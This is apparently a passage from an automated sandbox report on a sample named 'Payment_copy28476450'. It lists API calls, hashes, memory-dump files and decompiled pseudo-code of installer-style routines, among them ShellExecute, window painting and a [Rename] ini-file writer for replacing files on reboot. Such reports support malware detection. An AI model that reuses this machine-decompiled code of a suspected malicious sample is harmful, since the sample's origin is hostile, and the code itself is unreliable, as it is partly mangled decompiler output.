SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B6D
GetDlgItem.USER32 ref: 00403B8E
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BA2
IsWindowEnabled.USER32(00000000), ref: 00403BA9
GetDlgItem.USER32 ref: 00403C57
GetDlgItem.USER32 ref: 00403C61
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403C7B
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CCC
GetDlgItem.USER32 ref: 00403D72
ShowWindow.USER32(00000000,?), ref: 00403D93
EnableWindow.USER32(?,?), ref: 00403DA5
EnableWindow.USER32(?,?), ref: 00403DC0
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
EnableMenuItem.USER32 ref: 00403DDD
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DF5
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E08
lstrlenA.KERNEL32(00420580,?,00420580,00423780), ref: 00403E31
SetWindowTextA.USER32(?,00420580), ref: 00403E40
ShowWindow.USER32(?,0000000A), ref: 00403F74

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
Instruction ID: 583b1d6e72ee06ddf0416b700d05e2a9c6fbe9640e5ca120217838ed285f2c24
Opcode Fuzzy Hash: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
Instruction Fuzzy Hash: 00C1C471A08205BBDB216F61ED85D2B7FBCEB4470AF50443EF601B51E1C739AA429B1E

Uniqueness

Uniqueness Score: -1.00%

Function 004040FF Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004040FF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420560 =  *0x420560 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040401E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422f20
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f88, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f88, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420560 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd50 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403FD9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040438A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42375c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004040CB;
				E00403FB7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403FB7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403FD9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403FEC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423f90 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f544 =  *0x41f544 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420560 =  *0x420560 & 0x00000000;
				return 0;
			}

0x0040410f
0x00404235
0x00404291
0x00404295
0x0040436c
0x0040436e
0x0040436e
0x00404374
0x00404374
0x00404377
0x00000000
0x0040437e
0x004042a3
0x004042a5
0x004042af
0x004042ba
0x004042bd
0x004042c0
0x004042cb
0x004042ce
0x004042d5
0x004042e3
0x004042fb
0x00404303
0x0040430e
0x0040431e
0x00404320
0x00404320
0x004042d5
0x0040432a
0x00000000
0x00404335
0x00404339
0x0040434a
0x0040434a
0x00404350
0x0040435e
0x0040435e
0x00000000
0x00404362
0x0040432a
0x00404240
0x00000000
0x00404254
0x0040425a
0x00404260
0x00000000
0x00000000
0x00404285
0x00404287
0x0040428c
0x00000000
0x0040428c
0x00404240
0x00404115
0x00404118
0x0040411d
0x0040412e
0x0040412e
0x00404135
0x00404138
0x0040413a
0x0040413f
0x00404148
0x0040414e
0x0040415a
0x0040415d
0x00404166
0x0040416b
0x0040416e
0x00404173
0x0040418a
0x00404191
0x004041a4
0x004041a7
0x004041bc
0x004041c3
0x004041c8
0x004041cd
0x004041cd
0x004041dc
0x004041eb
0x004041ed
0x00404203
0x00404212
0x00404214
0x00000000

APIs

CheckDlgButton.USER32 ref: 0040418A
GetDlgItem.USER32 ref: 0040419E
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041BC
GetSysColor.USER32(?), ref: 004041CD
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041DC
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041EB
lstrlenA.KERNEL32(?), ref: 004041F5
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404203
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404212
GetDlgItem.USER32 ref: 00404275
SendMessageA.USER32(00000000), ref: 00404278
GetDlgItem.USER32 ref: 004042A3
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042E3
LoadCursorA.USER32 ref: 004042F2
SetCursor.USER32(00000000), ref: 004042FB
ShellExecuteA.SHELL32(0000070B,open, /B,00000000,00000000,00000001), ref: 0040430E
LoadCursorA.USER32 ref: 0040431B
SetCursor.USER32(00000000), ref: 0040431E
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040434A
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040435E

Strings

N, xrefs: 00404291
open, xrefs: 00404306
/B, xrefs: 00404303

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: /B$N$open
API String ID: 3615053054-636633259
Opcode ID: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
Instruction ID: 4ef5deaae8a6f16a89100f2c462af89a3ec6633dbf44de90af8596516ef02dbc
Opcode Fuzzy Hash: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
Instruction Fuzzy Hash: 85619FB1A40209BBEB109F60DD45F6A7B79FB44715F108036FB05BA2D1C7B8A951CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f90;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423f88;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00423780,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
Instruction ID: 5ee0eae5ae25bcf212c08558168c62b52fbe6696795006813c9da87f91bafb02
Opcode Fuzzy Hash: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
Instruction Fuzzy Hash: 00419A71804249AFCB058F94DD459AFBBB9FF44315F00812AF961AA2A0C738AA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405A49 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00405A49(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00406087(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x424010 =  *0x424010 + 1;
						return _t20;
					}
				}
				 *0x422710 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422188, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d88, "%s=%s\r\n", 0x422710, 0x422188);
						_t56 = _t55 + 0x10;
						E00405D1D(_t43, 0x400, 0x422188, 0x422188,  *((intOrPtr*)( *0x423f90 + 0x128)));
						_t20 = E004059D2(0x422188, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405947(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405947(_t26 + 0xa, 0x409424);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405993(_t51 + _t29, 0x421d88, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405CFB(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004059D2(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422710, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x00405a4f
0x00405a56
0x00405a5a
0x00405a63
0x00405a67
0x00405ba6
0x00405ba6
0x00000000
0x00405ba6
0x00405a67
0x00405a73
0x00405a89
0x00405ab1
0x00405abc
0x00405ac0
0x00405ae0
0x00405ae7
0x00405af1
0x00405afe
0x00405b03
0x00405b08
0x00405b0c
0x00000000
0x00000000
0x00405b1b
0x00405b1d
0x00405b2a
0x00405b2e
0x00405b9f
0x00405ba0
0x00000000
0x00405b4a
0x00405b57
0x00405bbc
0x00405bc3
0x00405b6a
0x00405b6a
0x00405b6c
0x00405b75
0x00405b80
0x00405b92
0x00405b99
0x00000000
0x00405b99
0x00405bc5
0x00405bc6
0x00405bcb
0x00405bcd
0x00405bda
0x00405bda
0x00405bde
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bcf
0x00405bcf
0x00405bd2
0x00405bd5
0x00405bd6
0x00000000
0x00405bcf
0x00405b62
0x00405b67
0x00000000
0x00405b67
0x00405b2e
0x00405a8b
0x00405a96
0x00405a9f
0x00405aa3
0x00000000
0x00000000
0x00405aa3
0x00405bb0

APIs

Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004057DE,?,00000000,000000F1,?), ref: 00405A96
GetShortPathNameA.KERNEL32 ref: 00405A9F
GetShortPathNameA.KERNEL32 ref: 00405ABC
wsprintfA.USER32 ref: 00405ADA
GetFileSize.KERNEL32(00000000,00000000,00422188,C0000000,00000004,00422188,?,?,?,00000000,000000F1,?), ref: 00405B15
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B24
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B3A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D88,00000000,-0000000A,00409424,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405B80
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405B92
GlobalFree.KERNEL32 ref: 00405B99
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BA0

Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E

Strings

%s=%s, xrefs: 00405AD0
[Rename], xrefs: 00405B4A, 00405B5C

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3445103937-1727408572
Opcode ID: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
Instruction ID: d3b858f9c50fd1002edea1203351e8dfee5eb830211114c78627ca8ef1b38bc0
Opcode Fuzzy Hash: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
Instruction Fuzzy Hash: 2B41FF71A45A15BBD7206B619D49F6B3AACEF80754F140436FE05F22C2E67CBC018EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D1D Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405D1D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42375c - 4 + _t36 * 4);
				}
				_t74 =  *0x423fb8 + _t36;
				_t37 = 0x422f20;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422f20;
				if(_a4 - 0x422f20 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405D1D(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422f20;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405CFB(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405C59(_t86,  *0x423f88);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405F5D(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x424004;
						if( *0x424004 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f84;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423fb8;
							E00405BE2(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423fb8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405D1D(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405CFB(_a4, _t37);
			}

0x00405d1d
0x00405d1d
0x00405d1d
0x00405d23
0x00405d28
0x00405d39
0x00405d39
0x00405d44
0x00405d46
0x00405d4b
0x00405d4e
0x00405d4f
0x00405d56
0x00405d58
0x00405d5e
0x00405d61
0x00405d61
0x00405f3a
0x00405f3a
0x00405f3e
0x00000000
0x00000000
0x00405d6e
0x00405d74
0x00000000
0x00000000
0x00405d7a
0x00405d7b
0x00405d7e
0x00405d81
0x00405f2d
0x00405f37
0x00405f39
0x00405f39
0x00405f2f
0x00405f31
0x00405f33
0x00405f34
0x00405f34
0x00000000
0x00405f2d
0x00405d87
0x00405d8b
0x00405d9b
0x00405d9f
0x00405da6
0x00405da9
0x00405dad
0x00405db3
0x00405db6
0x00405db9
0x00405dbc
0x00405ed7
0x00405eda
0x00405f0a
0x00405f0d
0x00405f12
0x00405f16
0x00405f16
0x00405f1b
0x00405f1c
0x00405f21
0x00405f24
0x00405f26
0x00000000
0x00405f26
0x00405edc
0x00405edf
0x00405ef4
0x00405efb
0x00405ee1
0x00405ee8
0x00405ee8
0x00405f03
0x00405f06
0x00405ecf
0x00405ed0
0x00405ed0
0x00000000
0x00405f06
0x00405dc4
0x00405dc5
0x00405dcb
0x00405dcd
0x00405de7
0x00405de7
0x00405dee
0x00405dee
0x00405df5
0x00405df9
0x00405df9
0x00405dfa
0x00405dfc
0x00405e35
0x00405e38
0x00405e48
0x00405e4b
0x00405e53
0x00405e59
0x00405e59
0x00405eb5
0x00405eb5
0x00405eb7
0x00000000
0x00000000
0x00405e5d
0x00405e64
0x00405e65
0x00405e67
0x00405e81
0x00405e8f
0x00405e95
0x00405e97
0x00405eb2
0x00405eb2
0x00405eb2
0x00000000
0x00405eb2
0x00405e9d
0x00405ea8
0x00405eae
0x00405eb0
